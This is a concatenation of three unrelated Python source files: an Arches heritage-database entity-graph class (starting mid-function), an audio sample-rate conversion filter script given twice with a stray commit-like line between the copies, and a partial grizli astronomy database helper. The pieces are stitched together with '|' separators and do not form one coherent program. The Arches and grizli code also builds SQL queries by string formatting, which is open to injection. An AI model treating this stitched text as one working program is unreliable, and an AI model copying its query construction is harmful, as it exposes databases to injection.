#break out of the traversal if the function returns a value
if ret != None:
return ret
def get_rank(self, rank=0):
"""
Get the rank of this instance (root is 0)
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_rank(rank+1)
return rank
def get_root(self):
"""
Get the root node of this instance
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_root()
return self
def set_entity_value(self, entitytypeid, value, append=False):
"""
Directly sets the value of a node in the graph
Will only set the value if the node exists and there is only one instance of that node or if the node doesn't exist it will be created
If append is set to True, the node will simply be appended next to other nodes of the same type
"""
entities = self.find_entities_by_type_id(entitytypeid)
if append or len(entities) == 0:
schema = Entity.get_mapping_schema(self.entitytypeid)
entity = Entity()
entity.create_from_mapping(self.entitytypeid, schema[entitytypeid]['steps'], entitytypeid, value)
self.merge_at(entity, schema[entitytypeid]['mergenodeid'])
return entity
if len(entities) == 1:
entities[0].value = value
return entities[0]
def create_from_mapping(self, entitytypeid, mappingsteps, leafentitytypeid, leafvalue, leafentityid=''):
currentEntity = self
currentEntity.entitytypeid = entitytypeid
for step in mappingsteps:
currentEntity.entityid = ''
value = ''
if step['entitytyperange'] == leafentitytypeid:
value = leafvalue
currentEntity = currentEntity.add_child_entity(step['entitytyperange'], step['propertyid'], value, leafentityid)
return self
@classmethod
def get_mapping_schema(cls, entitytypeid):
"""
Gets a complete entity schema graph for a single entity type given an entity type id
"""
ret = {}
mappings = archesmodels.Mappings.objects.filter(entitytypeidfrom = entitytypeid)
for mapping in mappings:
if mapping.entitytypeidto.pk not in ret:
ret[mapping.entitytypeidto.pk] = {'steps':[], 'mergenodeid': mapping.mergenodeid}
ret[mapping.entitytypeidto.pk]['steps'] = (Entity._get_mappings(mapping.pk))
return ret
@classmethod
def _get_mappings(cls, mappingid):
"""
Gets a single mapping given an mapping id
"""
ret = []
cursor = connection.cursor()
cursor.execute("""
SELECT
rules.entitytypedomain,
rules.entitytyperange,
rules.propertyid,
mapping_steps."order",
mappings.entitytypeidfrom,
mappings.entitytypeidto,
mapping_steps.mappingid
FROM
ontology.rules,
ontology.mapping_steps,
ontology.mappings
WHERE
mapping_steps.ruleid = rules.ruleid AND
mappings.mappingid = '%s' AND
mappings.mappingid = mapping_steps.mappingid
ORDER BY
mappings.entitytypeidfrom ASC,
mappings.entitytypeidto ASC,
mappings.mappingid ASC,
mapping_steps."order" ASC;
""" % (mappingid))
mapping_steps = cursor.fetchall()
for mapping_step in mapping_steps:
rule = {}
rule['entitytypedomain'] = mapping_step[0]
rule['entitytyperange'] = mapping_step[1]
rule['propertyid'] = mapping_step[2]
ret.append(rule)
return ret
def prune(self, entitytypes, action='disallow'):
"""
entitytypes is a list of entitytypeids allowed or dissallowed in the graph
if action=disallow (the default) then prune will remove all entities and their children from the entity graph that match the list of provided entitytypes
if action=allow then prune will pass through all entities and their parents from the entity graph that match the list of provided entitytypes
.. code-block:: python
# simple example of prunning a graph
entity.prune(['ARCHES RECORD.E31', 'PHASE TYPE ASSIGNMENT.E17', 'SPATIAL COORDINATES_GEOMETRY.E47', 'NAME.E41'])
# a more fully formed example of prunning a graph based on user permissions
fullgraph = set(entity.flatten())
from django.contrib.auth.models import User
user = User.objects.get(pk=1)
print user
if not user.is_superuser:
permissions = user.get_all_permissions()
entitytypes = []
for permission in permissions:
if permission.startswith('%s.read_' % entity.entitytypeid):
print permission.split('%s.read_' % entity.entitytypeid)[1]
entitytypes.append(permission.split('%s.read_' % entity.entitytypeid)[1])
entity.prune(entitytypes, action='allow')
prunedgraph = set(entity.flatten())
print fullgraph.intersection(prunedgraph)
print fullgraph.issuperset(prunedgraph)
print fullgraph.symmetric_difference(prunedgraph)
"""
if action == 'disallow':
self.filter(lambda entity: entity.entitytypeid not in entitytypes)
else:
self.filter(lambda entity: entity.entitytypeid in entitytypes)
return
# parent_entitytypes = set()
# flattened_graph = self.flatten()
# entities_to_prune = set()
# def gather_parent_entitytypes(entity):
# if entity.get_rank() == 0:
# return
# parent_entity = entity.get_parent()
# parent_entitytypes.add(parent_entity.entitytypeid)
# gather_parent_entitytypes(parent_entity)
# if action == 'disallow':
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# entities_to_prune.add(entity)
# else:
# # if you passed in no entitytypes then you're basically saying remove all information from the graph
# if len(entitytypes) == 0:
# self.clear()
# return
# # first we need to loop through the graph to all the parents of entity to the list of allowed entitytypes
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# gather_parent_entitytypes(entity)
# entitytypes = entitytypes + list(parent_entitytypes)
# for entity in flattened_graph:
# if entity.entitytypeid not in entitytypes:
# entities_to_prune.add(entity)
# # prune the remaining entities
# print 'entities to prune: %s' % entities_to_prune
# for entity in entities_to_prune:
# try:
# parent = entity.get_parent()
# print '\nremoving: %s' % entity
# parent.child_entities.remove(entity)
# except:
# if entity.get_rank() == 0:
# self.clear()
# return
self.trim()
def trim(self):
"""
recursively removes all nodes starting from the leaf that have no child_entities and no value
these nodes are assumed to be of no material value to the graph
"""
#somelist[:] = [tup for tup in somelist if determine(tup)]
# def func(entity):
# try:
# parent = entity.get_parent()
# print '-'*10
# print entity
# print len(parent.child_entities)
# if len(entity.child_entities) == 0 and entity.value == '':
# print JSONSerializer().serialize(entity, indent=4)
# parent.child_entities.remove(entity)
# print len(parent.child_entities)
# except:
# pass
# def func(entity):
# try:
# # http://stackoverflow.com/questions/1207406/remove-items-from-a-list-while-iterating-in-python
# parent = entity.get_parent()
# parent.child_entities[:] = [child_entity for child_entity in parent.child_entities if (len(child_entity.child_entities) != 0 or child_entity.value != '')]
# except:
# pass
#self.traverse(func)
self.filter((lambda entity: len(entity.child_entities) != 0 or entity.value != ''))
def filter(self, lambda_expression):
"""
Only allows the nodes defined in the lambda_expression to populate the entity graph
(eg: filters out of the entity graph any entity that doesn't return true from the lambda_expression)
"""
def func(entity):
if hasattr(entity, 'get_parent'):
parent = entity.get_parent()
parent.child_entities[:] = filter(lambda_expression, parent.child_entities)
# else:
# entity.child_entities[:] = filter(lambda_expression, entity.child_entities)
self.traverse(func)
def clear(self):
"""
resets this entity back to a clean state (does not delete the entity from the database)
"""
self.child_entities = []
self.entitytypeid = ''
self.entityid = ''
self.value = ''
@staticmethod
def _get_model(tablename):
"""
Helper to look up a model from a table name.
"""
try:
model_identifier = str('models.' + tablename)
Model = models.get_model(*model_identifier.split("."))
except TypeError:
Model = None
if Model is None:
raise TypeError(u"Invalid model identifier: '%s'" % model_identifier)
return Model
def dictify(self, keys=['label']):
"""
Takes an entity and turns it into recursive lists nested objects
Uses an in-built algorithm to derive which sub-branches appear to be grouped, and then flattens them out
A partial example output follows...
.. code-block:: python
[
{
"EVALUATION_CRITERIA_ASSIGNMENT_E13": [{
"STATUS_E55": [
{"STATUS_E55__label": "3D"},
{"STATUS_E55__label": "3CD"},
{"STATUS_E55__label": "5D3"}
]
}],
"BEGINNING_OF_EXISTENCE_E63": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52__label": "",
"START_DATE_OF_EXISTENCE_E49__label": "1962-01-01T00:00:00"
}],
"BEGINNING_OF_EXISTENCE_TYPE_E55": [{
"BEGINNING_OF_EXISTENCE_TYPE_E55__label": "Built Date"
}]
}],
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"PRODUCTION_E12": [{
"PHASE_TYPE_ASSIGNMENT_E17": [
{
"STYLE_E55": [{
"STYLE_E55__label": "Modern, Mid-Century"
}],
"HERITAGE_RESOURCE_TYPE_E55": [{
"HERITAGE_RESOURCE_TYPE_E55__label": "HP02. Single family property"
},{
"HERITAGE_RESOURCE_TYPE_E55__label": "House"
}],
"HERITAGE_RESOURCE_USE_TYPE_E55": [{
"HERITAGE_RESOURCE_USE_TYPE_E55__label": "Historic"
}]
}
]
}]
}
]
"""
data = {}
for child_entity in self.child_entities:
if child_entity.businesstablename != '':
data[child_entity.undotify()] = self.get_nodes(child_entity.entitytypeid, keys=keys)
else:
if child_entity.undotify() not in data:
data[child_entity.undotify()] = []
data[child_entity.undotify()].append(child_entity.dictify(keys=keys))
return data
def get_nodes(self, entitytypeid, keys=[]):
"""
Used by dictify to gather and flatten a single node (by entitytypeid) and all it's children
for example, a NAME.E41 node with a single child of NAME_TYPE.E55 would be transformed as below
.. code-block:: python
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"""
ret = []
entities = self.find_entities_by_type_id(entitytypeid)
for entity in entities:
data = {}
for entity in entity.flatten():
data = dict(data.items() + entity.encode(keys=keys).items())
ret.append(data)
return ret
def encode(self, keys=[]):
"""
Encodes an Entity into a dictionary of keys derived by the entitytypeid of the Entity concatonated wtih property name
.. code-block:: python
{
"NAME_TYPE_E55__label": "Primary"
}
"""
ret = {}
for key, value in self.__dict__.items():
if key in keys:
ret['%s__%s' % (self.undotify(), key)] = value
return ret
def undotify(self):
return self.undotify_entitytypeid()
def undotify_entitytypeid(self):
return self.entitytypeid.replace('.', '_').replace('-', '___');
def to_json(self):
return JSONSerializer().serialize(self) |
import fractions
import math
import numpy
import scipy
import scipy.signal as signal
import scipy.io.wavfile as wavfile
import matplotlib.pyplot as plot
import sys
import wave
from_rate = 44100.0
to_rate = 48000.0
rategcd = fractions.gcd(from_rate, to_rate)
samp_rate = from_rate * to_rate / rategcd
print("upsample rate: %f kHz\n" % (samp_rate/1000))
ups_ratio = int(samp_rate / from_rate)
dec_ratio = int(samp_rate / to_rate)
print("ups: %d, dec: %d\n" % (ups_ratio, dec_ratio))
nyq_rate = samp_rate / 2.0
audible_freq = 22000.0
def ratio_to_db(ratio):
return 10 * math.log10(ratio)
def db_to_ratio(db):
return math.pow(10, db / 10)
def gen_sin(db, freq, sampling_rate, t):
amplitude = db_to_ratio(db)
n = int(t * sampling_rate)
ret = numpy.zeros(n)
for i in xrange(n):
theta = float(i) * freq * 2 * math.pi / sampling_rate
ret[i] = math.sin(theta) * amplitude
return ret
def apply_filter(src, taps, ups, dec):
ups = int(ups)
dec = int(dec)
depth = len(taps) / ups
dst = []
firidx = 0
si = 0
while True:
d = 0.0
for j in xrange(depth):
s = src[si + j]
c = taps[ups-1-firidx + j*ups]
d += s * c
d *= ups
dst.append(d)
firidx += dec
if firidx >= ups:
firidx -= ups
si += 1
if si > len(src) - depth:
break
return dst
def half_filter(taps):
n = len(taps)
return taps[n/2:n]
def reorder_half_filter(htaps, ups, dec):
ups = int(ups)
dec = int(dec)
hn = len(htaps)
hd = hn / ups
depth = hd*2
r = numpy.zeros(len(htaps))
ri = 0
for i in xrange(ups):
for j in xrange(hd):
r[ri] = htaps[ups-1-i + j*ups]
ri += 1
return r
def muladd(mcand, mplier, cross):
if len(mcand) != len(mplier):
raise ValueError('mcand and mplier len do not match!')
n = len(mcand)
ret = 0.0
if cross:
for i in xrange(n):
ret += mcand[i] * mplier[n-1-i]
else:
for i in xrange(n):
ret += mcand[i] * mplier[i]
return ret
def apply_filter_half_reordered(src, rhtaps, ups, dec):
ups = int(ups)
dec = int(dec)
hn = len(rhtaps)
hd = hn / ups
depth = hd * 2
dst = []
firidx = 0
si = 0
while True:
d = 0.0
# L
o = hn-(firidx+1)*hd
d += muladd(src[si:si+hd], rhtaps[o:o+hd], True)
# R
o = firidx*hd
d += muladd(src[si+hd:si+hd*2], rhtaps[o:o+hd], False)
d *= ups
dst.append(d)
firidx += dec
if firidx >= ups:
firidx -= ups
si += 1
if si > len(src) - depth:
break
return dst
def plot_filterfreqresp(taps, nyq_rate):
w, h = signal.freqz(taps, worN=8000)
h_dB = 20 * numpy.log10(abs(h))
plot.plot((w/math.pi)*nyq_rate, h_dB)
plot.xlabel("freq")
plot.ylabel("gain dB")
plot.xlim(0, 40000)
plot.ylim(-100, 5)
plot.grid(True)
def plot_waveform(d, sampling_freq):
t_xaxis = numpy.arange(len(d)) / sampling_freq
plot.plot(t_xaxis, d, marker='o')
def plot_periodogram(d, sampling_freq, col='b'):
f, p = signal.periodogram(d, sampling_freq, scaling='spectrum')
db = numpy.log10(p) * 10
plot.ylim([-180, 0])
plot.xlim([0, 22000])
# plot.xscale('log')
plot.plot(f, db, col)
def findzc(d):
s = 0
for i in xrange(1, len(d)):
if d[i-1] < 0 and d[i] > 0:
s = i
break
e = 0
for j in xrange(1, len(d)):
i = len(d)-j
if d[i-1] < 0 and d[i] > 0:
e = i
break
return d[s:e]
def test_sin1khz(f):
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
res = f(sin1khz)
print("done res")
plot.subplot(411)
plot.plot(taps)
plot.subplot(412)
plot_filterfreqresp(taps, nyq_rate)
plot.subplot(413)
# plot_waveform(sin1khz, from_rate)
plot_waveform(res[0:300], to_rate)
plot.subplot(414)
plot_periodogram(findzc(sin1khz[1000:len(sin1khz)-1000]), from_rate, 'r')
plot_periodogram(findzc(res), to_rate)
plot.show()
def test_sweep(f):
amp = db_to_ratio(-6)
te = 8
t = numpy.linspace(0, 8, from_rate*8)
x = signal.chirp(t, f0=0, f1=from_rate, t1=te, method='quadratic') * amp
print("done chirp")
y = f(x)
print("done filtering")
nfft = 64
win = scipy.hamming(nfft)
plot.subplot(211)
plot.specgram(x, NFFT=nfft, Fs=from_rate, noverlap=nfft/2, window=win)
plot.subplot(212)
plot.specgram(y, NFFT=nfft, Fs=to_rate, noverlap=nfft/2, window=win)
plot.show()
# width = 5.0/nyq_rate
width = 100.0/nyq_rate
ripple_db = 30.0
N, beta = signal.kaiserord(ripple_db, width)
print("suggested N: %d, beta: %d" % (N,beta))
depth = 24
beta = 4
N = depth * ups_ratio
print("N: %d, beta: %d" % (N,beta))
print("polyphase depth: %d\n" % (N/ups_ratio))
# reqmem = N * 16 / 1024.0 / 2;
# print("reqmem: %fKb\n" % reqmem)
# w = ('kaiser', beta)
w = 'blackmanharris'
taps = signal.firwin(N, cutoff = audible_freq, window = w, nyq = nyq_rate)
def f(x):
return apply_filter(x, taps, ups_ratio, dec_ratio)
htaps = half_filter(taps)
rhtaps = reorder_half_filter(htaps, ups_ratio, dec_ratio)
def f3(x):
return apply_filter_half_reordered(x, rhtaps, ups_ratio, dec_ratio)
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
test_sin1khz(f3)
# test_sweep(f)
int filtering. seems 24/24 is needed...
import fractions
import math
import numpy
import scipy
import scipy.signal as signal
import scipy.io.wavfile as wavfile
import matplotlib.pyplot as plot
import sys
import wave
from_rate = 44100.0
to_rate = 48000.0
rategcd = fractions.gcd(from_rate, to_rate)
samp_rate = from_rate * to_rate / rategcd
print("upsample rate: %f kHz\n" % (samp_rate/1000))
ups_ratio = int(samp_rate / from_rate)
dec_ratio = int(samp_rate / to_rate)
print("ups: %d, dec: %d\n" % (ups_ratio, dec_ratio))
nyq_rate = samp_rate / 2.0
audible_freq = 22000.0
def ratio_to_db(ratio):
return 10 * math.log10(ratio)
def db_to_ratio(db):
return math.pow(10, db / 10)
def gen_sin(db, freq, sampling_rate, t):
amplitude = db_to_ratio(db)
n = int(t * sampling_rate)
ret = numpy.zeros(n)
for i in xrange(n):
theta = float(i) * freq * 2 * math.pi / sampling_rate
ret[i] = math.sin(theta) * amplitude
return ret
def apply_filter(src, taps, ups, dec):
ups = int(ups)
dec = int(dec)
depth = len(taps) / ups
dst = []
firidx = 0
si = 0
while True:
d = 0.0
for j in xrange(depth):
s = src[si + j]
c = taps[ups-1-firidx + j*ups]
d += s * c
d *= ups
dst.append(d)
firidx += dec
if firidx >= ups:
firidx -= ups
si += 1
if si > len(src) - depth:
break
return dst
def half_filter(taps):
n = len(taps)
return taps[n/2:n]
def reorder_half_filter(htaps, ups, dec):
ups = int(ups)
dec = int(dec)
hn = len(htaps)
hd = hn / ups
depth = hd*2
r = numpy.zeros(len(htaps))
ri = 0
for i in xrange(ups):
for j in xrange(hd):
r[ri] = htaps[ups-1-i + j*ups]
ri += 1
return r
def muladd(mcand, mplier, cross):
if len(mcand) != len(mplier):
raise ValueError('mcand and mplier len do not match!')
n = len(mcand)
ret = 0.0
if cross:
for i in xrange(n):
ret += mcand[i] * mplier[n-1-i]
else:
for i in xrange(n):
ret += mcand[i] * mplier[i]
return ret
def apply_filter_half_reordered(src, rhtaps, ups, dec):
ups = int(ups)
dec = int(dec)
hn = len(rhtaps)
hd = hn / ups
depth = hd * 2
dst = []
firidx = 0
si = 0
while True:
d = 0.0
# L
o = hn-(firidx+1)*hd
d += muladd(src[si:si+hd], rhtaps[o:o+hd], True)
# R
o = firidx*hd
d += muladd(src[si+hd:si+hd*2], rhtaps[o:o+hd], False)
d *= ups
dst.append(d)
firidx += dec
if firidx >= ups:
firidx -= ups
si += 1
if si > len(src) - depth:
break
return dst
def float_to_fixed(l, bits):
scale = (1 << (bits-1)) - 1
return [int(x * scale) for x in l]
def muladde(mcand, mplier, cross):
if len(mcand) != len(mplier):
raise ValueError('mcand and mplier len do not match!')
n = len(mcand)
ret = 0
if cross:
for i in xrange(n):
ret += mcand[i] * mplier[n-1-i]
else:
for i in xrange(n):
ret += mcand[i] * mplier[i]
return ret
def apply_filter_half_reordered_emu(srci, rhetaps, ups, dec):
ups = int(ups)
dec = int(dec)
hn = len(rhetaps)
hd = hn / ups
depth = hd * 2
dst = []
firidx = 0
si = 0
while True:
d = 0
# L
o = hn-(firidx+1)*hd
d += muladde(srci[si:si+hd], rhetaps[o:o+hd], True)
# R
o = firidx*hd
d += muladde(srci[si+hd:si+hd*2], rhetaps[o:o+hd], False)
dst.append(d)
firidx += dec
if firidx >= ups:
firidx -= ups
si += 1
if si > len(srci) - depth:
break
return dst
def plot_filterfreqresp(taps, nyq_rate):
w, h = signal.freqz(taps, worN=8000)
h_dB = 20 * numpy.log10(abs(h))
plot.plot((w/math.pi)*nyq_rate, h_dB)
plot.xlabel("freq")
plot.ylabel("gain dB")
plot.xlim(0, 40000)
plot.ylim(-100, 5)
plot.grid(True)
def plot_waveform(d, sampling_freq):
t_xaxis = numpy.arange(len(d)) / sampling_freq
plot.plot(t_xaxis, d, marker='o')
def plot_periodogram(d, sampling_freq, col='b'):
f, p = signal.periodogram(d, sampling_freq, scaling='spectrum')
db = numpy.log10(p) * 10
plot.ylim([-180, 0])
plot.xlim([0, 22000])
# plot.xscale('log')
plot.plot(f, db, col)
def findzc(d):
s = 0
for i in xrange(1, len(d)):
if d[i-1] < 0 and d[i] > 0:
s = i
break
e = 0
for j in xrange(1, len(d)):
i = len(d)-j
if d[i-1] < 0 and d[i] > 0:
e = i
break
return d[s:e]
def test_sin1khz(f):
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
res = f(sin1khz)
print("done res")
plot.subplot(411)
plot.plot(taps)
plot.subplot(412)
plot_filterfreqresp(taps, nyq_rate)
plot.subplot(413)
# plot_waveform(sin1khz, from_rate)
plot_waveform(res[0:300], to_rate)
plot.subplot(414)
plot_periodogram(findzc(sin1khz[1000:len(sin1khz)-1000]), from_rate, 'r')
plot_periodogram(findzc(res), to_rate)
plot.show()
def test_sweep(f):
amp = db_to_ratio(-6)
te = 8
t = numpy.linspace(0, 8, from_rate*8)
x = signal.chirp(t, f0=0, f1=from_rate, t1=te, method='quadratic') * amp
print("done chirp")
y = f(x)
print("done filtering")
nfft = 64
win = scipy.hamming(nfft)
plot.subplot(211)
plot.specgram(x, NFFT=nfft, Fs=from_rate, noverlap=nfft/2, window=win)
plot.subplot(212)
plot.specgram(y, NFFT=nfft, Fs=to_rate, noverlap=nfft/2, window=win)
plot.show()
# width = 5.0/nyq_rate
width = 100.0/nyq_rate
ripple_db = 30.0
N, beta = signal.kaiserord(ripple_db, width)
print("suggested N: %d, beta: %d" % (N,beta))
depth = 24
beta = 4
N = depth * ups_ratio
print("N: %d, beta: %d" % (N,beta))
print("polyphase depth: %d\n" % (N/ups_ratio))
# reqmem = N * 16 / 1024.0 / 2;
# print("reqmem: %fKb\n" % reqmem)
# w = ('kaiser', beta)
w = 'blackmanharris'
taps = signal.firwin(N, cutoff = audible_freq, window = w, nyq = nyq_rate)
def f(x):
return apply_filter(x, taps, ups_ratio, dec_ratio)
htaps = half_filter(taps)
rhtaps = reorder_half_filter(htaps, ups_ratio, dec_ratio)
tapsbits = 24
rhetaps = float_to_fixed(rhtaps * ups_ratio, tapsbits)
srcbits = 24
def f2(x):
xi = float_to_fixed(x, srcbits)
resi = apply_filter_half_reordered_emu(xi, rhetaps, ups_ratio, dec_ratio)
scale = 1.0 / ((1 << (srcbits-1 + tapsbits-1)) - 1)
res = [float(x) * scale for x in resi]
return res
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
test_sin1khz(f2)
# test_sweep(f)
|
"""
Interact with the grizli AWS database
"""
import os
import glob
import numpy as np
try:
import pandas as pd
except:
pd = None
from .. import utils
FLAGS = {'init_lambda': 1,
'start_beams': 2,
'done_beams': 3,
'no_run_fit': 4,
'start_redshift_fit': 5,
'fit_complete': 6}
COLUMNS = ['root', 'id', 'status', 'ra', 'dec', 'ninput', 'redshift', 'as_epsf', 't_g102', 'n_g102', 'p_g102', 't_g141', 'n_g141', 'p_g141', 't_g800l', 'n_g800l', 'p_g800l', 'numlines', 'haslines', 'chi2poly', 'chi2spl', 'splf01', 'sple01', 'splf02', 'sple02', 'splf03', 'sple03', 'splf04', 'sple04', 'huberdel', 'st_df', 'st_loc', 'st_scl', 'dof', 'chimin', 'chimax', 'bic_poly', 'bic_spl', 'bic_temp', 'z02', 'z16', 'z50', 'z84', 'z97', 'zwidth1', 'zwidth2', 'z_map', 'zrmin', 'zrmax', 'z_risk', 'min_risk', 'd4000', 'd4000_e', 'dn4000', 'dn4000_e', 'dlineid', 'dlinesn', 'flux_pab', 'err_pab', 'ew50_pab', 'ewhw_pab', 'flux_hei_1083', 'err_hei_1083', 'ew50_hei_1083', 'ewhw_hei_1083', 'flux_siii', 'err_siii', 'ew50_siii', 'ewhw_siii', 'flux_oii_7325', 'err_oii_7325', 'ew50_oii_7325', 'ewhw_oii_7325', 'flux_ariii_7138', 'err_ariii_7138', 'ew50_ariii_7138', 'ewhw_ariii_7138', 'flux_sii', 'err_sii', 'ew50_sii', 'ewhw_sii', 'flux_ha', 'err_ha', 'ew50_ha', 'ewhw_ha', 'flux_oi_6302', 'err_oi_6302', 'ew50_oi_6302', 'ewhw_oi_6302', 'flux_hei_5877', 'err_hei_5877', 'ew50_hei_5877', 'ewhw_hei_5877', 'flux_oiii', 'err_oiii', 'ew50_oiii', 'ewhw_oiii', 'flux_hb', 'err_hb', 'ew50_hb', 'ewhw_hb', 'flux_oiii_4363', 'err_oiii_4363', 'ew50_oiii_4363', 'ewhw_oiii_4363', 'flux_hg', 'err_hg', 'ew50_hg', 'ewhw_hg', 'flux_hd', 'err_hd', 'ew50_hd', 'ewhw_hd', 'flux_h7', 'err_h7', 'ew50_h7', 'ewhw_h7', 'flux_h8', 'err_h8', 'ew50_h8', 'ewhw_h8', 'flux_h9', 'err_h9', 'ew50_h9', 'ewhw_h9', 'flux_h10', 'err_h10', 'ew50_h10', 'ewhw_h10', 'flux_neiii_3867', 'err_neiii_3867', 'ew50_neiii_3867', 'ewhw_neiii_3867', 'flux_oii', 'err_oii', 'ew50_oii', 'ewhw_oii', 'flux_nevi_3426', 'err_nevi_3426', 'ew50_nevi_3426', 'ewhw_nevi_3426', 'flux_nev_3346', 'err_nev_3346', 'ew50_nev_3346', 'ewhw_nev_3346', 'flux_mgii', 'err_mgii', 'ew50_mgii', 'ewhw_mgii', 'flux_civ_1549', 'err_civ_1549', 'ew50_civ_1549', 'ewhw_civ_1549', 'flux_ciii_1908', 'err_ciii_1908', 'ew50_ciii_1908', 'ewhw_ciii_1908', 'flux_oiii_1663', 'err_oiii_1663', 'ew50_oiii_1663', 'ewhw_oiii_1663', 'flux_heii_1640', 'err_heii_1640', 'ew50_heii_1640', 'ewhw_heii_1640', 'flux_niii_1750', 'err_niii_1750', 'ew50_niii_1750', 'ewhw_niii_1750', 'flux_niv_1487', 'err_niv_1487', 'ew50_niv_1487', 'ewhw_niv_1487', 'flux_nv_1240', 'err_nv_1240', 'ew50_nv_1240', 'ewhw_nv_1240', 'flux_lya', 'err_lya', 'ew50_lya', 'ewhw_lya', 'pdf_max', 'cdf_z', 'sn_pab', 'sn_hei_1083', 'sn_siii', 'sn_oii_7325', 'sn_ariii_7138', 'sn_sii', 'sn_ha', 'sn_oi_6302', 'sn_hei_5877', 'sn_oiii', 'sn_hb', 'sn_oiii_4363', 'sn_hg', 'sn_hd', 'sn_h7', 'sn_h8', 'sn_h9', 'sn_h10', 'sn_neiii_3867', 'sn_oii', 'sn_nevi_3426', 'sn_nev_3346', 'sn_mgii', 'sn_civ_1549', 'sn_ciii_1908', 'sn_oiii_1663', 'sn_heii_1640', 'sn_niii_1750', 'sn_niv_1487', 'sn_nv_1240', 'sn_lya', 'chinu', 'bic_diff', 'log_risk', 'log_pdf_max', 'zq', 'mtime', 'vel_bl', 'vel_nl', 'vel_z', 'vel_nfev', 'vel_flag', 'grizli_version']
engine = None
def get_connection_info(config_file=None):
"""
Read the database connection info
"""
import yaml
if config_file is None:
config_file = os.path.join(os.path.dirname(__file__),
'../data/db.yml')
try:
local_file = os.path.join(os.getenv('HOME'), 'db.local.yml')
if os.path.exists(local_file):
# print('Use ~/db.local.yml')
config_file = local_file
except:
pass
fp = open(config_file)
try:
db_info = yaml.load(fp, Loader=yaml.FullLoader)
except:
db_info = yaml.load(fp)
fp.close()
return db_info
def get_db_engine(config=None, echo=False):
"""
Generate an SQLAlchemy engine for the grizli database
"""
from sqlalchemy import create_engine
import sqlalchemy.pool as pool
import psycopg2
import boto3
# With IAM auth
iam_file = os.path.join(os.getenv('HOME'), 'db.iam.yaml')
if os.path.exists(iam_file):
config = get_connection_info(config_file=iam_file)
session = boto3.Session()
client = session.client('rds', region_name=config['region'])
token = client.generate_db_auth_token(DBHostname=config['hostname'],
Port=config['port'],
DBUsername=config['username'],
Region=config['region'])
# conn = psycopg2.connect(host=config['hostname'],
# port=config['port'],
# database=config['database'],
# user=config['username'],
# password=token,
# sslrootcert="SSLCERTIFICATE")
#
# engine = create_engine('postgresql+psycopg2://', creator=POOL.getconn)
connect_args = dict(host=config['hostname'],
port=config['port'],
database=config['database'],
user=config['username'],
password=token,
sslrootcert="SSLCERTIFICATE")
engine = create_engine('postgresql+psycopg2://',
connect_args=connect_args)
return engine
if config is None:
config = get_connection_info()
db_string = "postgresql://{0}:{1}@{2}:{3}/{4}"
db_string = db_string.format(config['username'], config['password'],
config['hostname'], config['port'],
config['database'])
engine = create_engine(db_string, echo=echo)
return engine
def get_redshift_fit_status(root, id, table='redshift_fit', engine=None):
"""
Get status value from the database for root_id object
"""
import pandas as pd
if engine is None:
engine = get_db_engine(echo=False)
res = pd.read_sql_query("SELECT status FROM {2} WHERE (root = '{0}' AND id = {1})".format(root, id, table), engine)
if len(res) == 0:
return -1
else:
return res['status'][0]
def update_jname():
from grizli import utils
from grizli.aws import db as grizli_db
res = grizli_db.from_sql("select p_root, p_id, p_ra, p_dec from photometry_apcorr", engine)
jn = [utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(0.001, 0.001), precision=2, targstr='j{rah}{ram}{ras}.{rass}{sign}{ded}{dem}{des}.{dess}') for ra, dec in zip(res['p_ra'], res['p_dec'])]
for c in res.colnames:
res.rename_column(c, c.replace('p_', 'j_'))
zres = grizli_db.from_sql("select root, phot_root, id, ra, dec, z_map,"
"q_z, t_g800l, t_g102, t_g141, status from "
"redshift_fit where ra is not null and "
"status > 5", engine)
# Find duplicates
from scipy.spatial import cKDTree
data = np.array([zres['ra'], zres['dec']]).T
ok = zres['q_z'].filled(-100) > -0.7
tree = cKDTree(data[ok])
dr, ix = tree.query(data[ok], k=2)
cosd = np.cos(data[:, 1]/180*np.pi)
dup = (dr[:, 1] < 0.01/3600) # & (zres['phot_root'][ix[:,0]] != zres['phot_root'][ix[:,1]])
ix0 = ix[:, 0]
ix1 = ix[:, 1]
dup = (dr[:, 1] < 0.01/3600)
dup &= (zres['phot_root'][ok][ix0] == zres['phot_root'][ok][ix1])
dup &= (zres['id'][ok][ix0] == zres['id'][ok][ix1])
# second is G800L
dup &= zres['t_g800l'].filled(0)[ok][ix1] > 10
# plt.scatter(zres['z_map'][ok][ix0[dup]], zres['z_map'][ok][ix1[dup]],
# marker='.', alpha=0.1)
def update_redshift_fit_status(root, id, status=0, table='redshift_fit', engine=None, verbose=True):
"""
Set the status flag in the table
"""
import time
import pandas as pd
from astropy.table import Table
from astropy.time import Time
NOW = Time.now().iso
if engine is None:
engine = get_db_engine(echo=False)
old_status = get_redshift_fit_status(root, id, table=table, engine=engine)
if old_status < 0:
# Need to add an empty row
tab = Table()
tab['root'] = [root]
tab['id'] = [id]
tab['status'] = [status]
tab['mtime'] = [NOW]
row_df = tab.to_pandas()
add_redshift_fit_row(row_df, engine=engine, table=table,
verbose=verbose)
else:
sqlstr = """UPDATE {0}
SET status = {1}, mtime = '{2}'
WHERE (root = '{3}' AND id = {4});
""".format(table, status, NOW, root, id)
if verbose:
msg = 'Update status for {0} {1}: {2} -> {3} on `{4}` ({5})'
print(msg.format(root, id, old_status, status, table, NOW))
if hasattr(engine, 'cursor'):
with engine.cursor() as cur:
cur.execute(sqlstr)
else:
engine.execute(sqlstr)
def execute_helper(sqlstr, engine):
"""
Different behaviour for psycopg2.connection and sqlalchemy.engine
"""
if hasattr(engine, 'cursor'):
with engine.cursor() as cur:
cur.execute(sqlstr)
else:
engine.execute(sqlstr)
def get_row_data(rowfile='gds-g800l-j033236m2748_21181.row.fits', status_flag=FLAGS['fit_complete']):
"""
Convert table from a row file to a pandas DataFrame
"""
import pandas as pd
